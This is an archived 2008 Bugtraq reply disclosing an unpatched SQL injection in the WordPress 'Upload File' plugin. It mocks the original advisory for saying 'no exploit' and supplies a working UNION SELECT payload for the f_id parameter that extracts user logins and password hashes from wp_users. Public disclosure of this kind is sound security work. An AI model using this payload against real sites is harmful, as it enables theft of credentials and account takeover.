| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: 25 May 2008 13:07:26 -0000 From: none@...e.com To: bugtraq@...urityfocus.com Subject: Re: vuln in WordPress plugin Upload File(UP) --------------------Summary---------------- Software: Upload File (WordPress Plugin) Critical Level: Moderate Type: SQL Injection Class: Remote Status: Unpatched PoC/Exploit: Not Available ---> * Solution: Not Available Discovered by: eserg.ru -----------------Description--------------- 1. SQL Injection. http://localhost/[path]/wp-uploadfile.php?f_id=[SQL] ---> no exploit SQL query: null/**/union/**/all/**/select/**/concat(user_login,0x3a,user_pass)/**/f rom/**/wp_users/* --> exploit. --------------PoC/Exploit---------------------- Waiting for developer(s) reply. --> 1)haha ... --> 2)so what you're going to make an exploit for a simple GET request ? --------------Solution--------------------- --> read this http://www.hsc.fr/ressources/normalisation/saf/draft-debeaupuis-saf-00.txt Regards.
Powered by blists - more mailing lists